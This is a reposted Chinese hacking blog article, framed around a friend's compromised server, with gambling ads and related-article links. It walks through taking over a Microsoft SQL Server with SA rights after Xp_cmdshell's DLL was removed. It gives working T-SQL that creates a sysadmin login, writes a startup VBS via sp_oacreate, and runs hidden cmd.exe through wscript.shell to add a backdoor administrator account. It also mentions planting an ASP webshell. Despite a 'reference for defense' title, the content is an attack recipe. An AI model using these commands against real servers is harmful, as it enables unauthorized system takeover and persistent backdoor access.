??斗地主捕鱼电竞提现秒到 广告位招租 - 15元/月全站展示
??支付宝搜索579087183领大额红包 ??伍彩集团官网直营彩票
??好待遇→招代理 ??伍彩集团官网直营彩票
??络茄网 广告位招租 - 15元/月全站展示
饶过Xplog70.dll玩入侵(参考防范)

转载   佚名   2010-06-29   浏览量:966


朋友叫我帮忙看看,这样和管理员的直接攻防较量我还没尝试过,所以也就答应了!
  因为是数据库是SA权限连接的,我首先想到的是利用下面的命令:
exec master.dbo.sp_addlogin renwoxin
我的目的是添加数据库用户“renwoxin”,然后将将其加入“Sysadmin”组:
Exec master.dbo.sp_addsrvrolemember renwoxin,sysadmin
然后就可以用祭出我们的“屠库宝刀”——SQL查询分析器了??嘉一贡ё乓凰拷男?,希望可以通过:
sp_addextendedproc Xp_cmdshell,@dllname='Xplog70.dll'
添加Xp_cmdshell扩展过程??上QL输出如下:
数据库中已存在名为Xp_cmdshell 的对象。
为了确认Xp_cmdshell是否被删除我提交如下语句:
select count(*) from master.dbo.sysobjects where xtype='X' and name=Xp_cmdshell
返回1,看来并未删除Xp_cmdshell对象,那问题应该是出在Xplog70.dll这个文件了,也许被改名或者删除了。
我决定用臭要饭的写的GetWebShell来写入ASP木马。工具使用很简单,以往的黑防也有介绍过。我使用后一会儿就提示写入成功了,但等我高高兴兴的去访问这个路径时,却提示“找不到网页”,郁闷!
  百思不得其解,拿出NBSI2,利用Tree list工具列出WEB路径下的文件,发现上传的木马“安详”地躺在那儿,可为什么不能访问呢(我现在都还不知道答案,哪位高人知道希望能指点一下),而且错误提示居然是“找不到文件”?!
我打算放弃了,可这么好的肉鸡就这么飞了,实在心有不甘!到百度一通狂搜,终于找到一篇文章,文中提出了一种方法,用SQL查询分析器写入如下指令:
Declare @o int, @f int, @t int, @ret int ,@a int
exec sp_oacreate ’scripting.filesystemobject’, @o out
——这两行代码是建立SQL的文本对象
exec sp_oamethod @o, ’createtextfile’, @f out,’c:\docume~1\alluse~1\「开始」菜单\程序\启动\a.vbs’, 1
--在启动菜单里写入a.vbs,当然这里只支持中文
exec @ret = sp_oamethod @f, ’writeline’, NULL,’set wshshell=createobject("wscript.shell")’
——单引号里的都是a.vbs的内容,要一行一行的写,下同。
exec @ret = sp_oamethod @f, ’writeline’, NULL,’a=wshshell.run ("cmd.exe /c net user user1 123 /add",0)’
exec @ret = sp_oamethod @f, ’writeline’, NULL,’b=wshshell.run ("cmd.exe /c net localgroup administrators user1 /add",0)’
--a.vbs内容结束
按照作者的说法,执行查循后会在服务器的启动程序里写入一个a.vbs脚本。等服务器重启就可以添加一个user1密码为123的用户??墒且确衿髦仄?,要到哪一天啊?!
对着这段代码是我是上看、下看、左看、右看,你还别说真看出点什么了。这个脚本用Sp_oamethod来调用OLE对象的Writeline方法,突然灵光一闪,我能不能用Sp_oamethod来执行CMD命令呢?赶紧找出“SQL Server联机丛书”,其中对Sp_OAMethod描述如下:
sp_OAMethod
调用 OLE 对象的方法。
语法
sp_OAMethod objecttoken,
????methodname
????[, returnvalue OUTPUT]
????[ , [ @parametername = ] parameter [ OUTPUT ]
????[...n]]
参数
objecttoken
是先前用 sp_OACreate 创建的 OLE 对象令牌。
methodname
是要调用的 OLE 对象的方法名。
用WScript.Shell对象的Run方法来运行Cmd.exe不就可以执行Cmd命令了吗?于是构造如下语句:
DECLARE @cmd INT
EXEC sp_oacreate 'wscript.shell',@cmd output
EXEC sp_oamethod @cmd,'run',null,'cmd.exe /c net user renwoxin$ test /add','0','true'

小提示:上面语句的详细解释是:
用Sp_OACreate创建OLE 对象Wscript.Shell的令牌。
用Sp_oamethod调用Wscript.Shell的Run方法来执行CMD语句,添加用户renwoxin$,密码为test。“0”和“true”是RUN方法的参数:“0”可选。表示程序窗口外观的整数值,表示语句执行时隐藏CMD窗口,如果不加的话,在服务器上会有一个DOS窗口闪一下,容易暴露;“true”可选。布尔值,表示在继续执行脚本中的下一条语句之前,脚本是否等待执行完程序。如果设为True,则在执行完程序后才执行脚本,RUN方法返回由程序返回的任何错误代码。如果设为False(默认值),则RUN方法将自动在启动程序后立即返回0(不是错误代码)。

上面的代码执行后,SQL查询分析器返回一个0值,这表示执行成功了,再将renwoxin$提升为管理员:
DECLARE @cmd INT
EXEC sp_oacreate 'wscript.shell',@cmd output
EXEC sp_oamethod @cmd,'run',null,'cmd.exe /c net localgroup administrators renwoxin$ /add','0','true'
这次又返回一个0值,还等什么,赶快从3389连过去看看,顺利进入!大家肯定会想到这个RUN可以执行几乎所有的CMD命令,只是如果你要看到结果,就需要自己构造表来存储了,大家可以发挥自己的想象力了!
找到SQL安装目录下的Binn文件夹,发现其中的Xplog70.dll果然被删除了。再检查一下,用GetWebShell提交的ASP木马,内容居然是乱码!反正是不能执行,到现在我还是想不通是为什么,希望大侠们能著文传授。到此文章也该结束了,希望能尽快看到大侠们的文章。

转载自://www.jb51.net/hack/28023.html

招聘 不方便扫码就复制添加关注:程序员招聘谷,微信号:jobs1024



Serv-U FTP Jail Break(越权遍历目录、下载任意文件)
Serv-U 越权遍历目录、下载任意文件,通过构造..:/来遍历服务器目录,下载任意文件
饶过Xplog70.dll玩入侵(参考防范)
深夜了,好友“如影随行”突然发来消息,说他一台配置非常好的3389肉鸡飞了。以前他是从WEB页面注入入手,然后直接用Xp_cmdshell添加系统用户搞定的,可晚上用3389登陆时突然发现添加的用户不在了,安装的后门都被清理干净,连Xp_cmdshell也执行不了。
九种突破IDS入侵检测系统的实用方法
入侵检测系统,英文简写为IDS,顾名思义,它是用来实时检测攻击行为以及报告攻击的。如果把防火墙比作守卫网络大门的门卫的话,那么入侵检测系统(IDS)就是可以主动寻找罪犯的巡警。
防止黑客入侵系统建立很难发现的隐藏帐户
一般用户很难发现系统中隐藏账户的存在,那么该怎么办呢?其实我们可以通过以下几点来解决这个问题,接下来教你如何把隐藏账户彻底请出系统,感兴趣的朋友不要错过
SC.exe在渗透中的妙用
sc为微软自带的一个服务管理工具,不过我们一般却很少用到,这里我们只提取出几个特殊的用法,以便我们在做Web安全测试中获取所需信息。
SQL注入攻击的种类和防范手段
观察近来的一些安全事件及其后果,安全专家们已经得到一个结论,这些威胁主要是通过SQL注入造成的。虽然前面有许多文章讨论了SQL注入,但今天所讨论的内容也许可帮助你检查自己的服务器,并采取相应防范措施。
饶过Xplog70.dll玩入侵 参考防范
深夜了,好友“如影随行”突然发来消息,说他一台配置非常好的3389肉鸡飞了。以前他是从WEB页面注入入手,然后直接用Xp_cmdshell添加系统用户搞定的,可晚上用3389登陆时突然发现添加的用户不在了,安装的后门都被清理干净,连Xp_cmdshell也执行不了。
dedecms v5.1/5.5 两处跨站漏洞的修复办法
dedecms两处跨站漏洞的修复办法,大家可以防范下,以防被黑客利用。
巧用Cacls.exe命令来修改文件访问控制权限
建议大家亲自尝试一下,你会发现它还有很多奇妙的功能。
个人主机 入侵网络攻击的步骤
个人主机入侵网络攻击的步骤  第一步:隐藏自已的位置  为了不在目的主机上留下自己的IP地址,防止被目的主机发现,老练的攻击者都会尽量通过“跳板”或“肉鸡”展开攻击。所谓“肉鸡”通常是指,...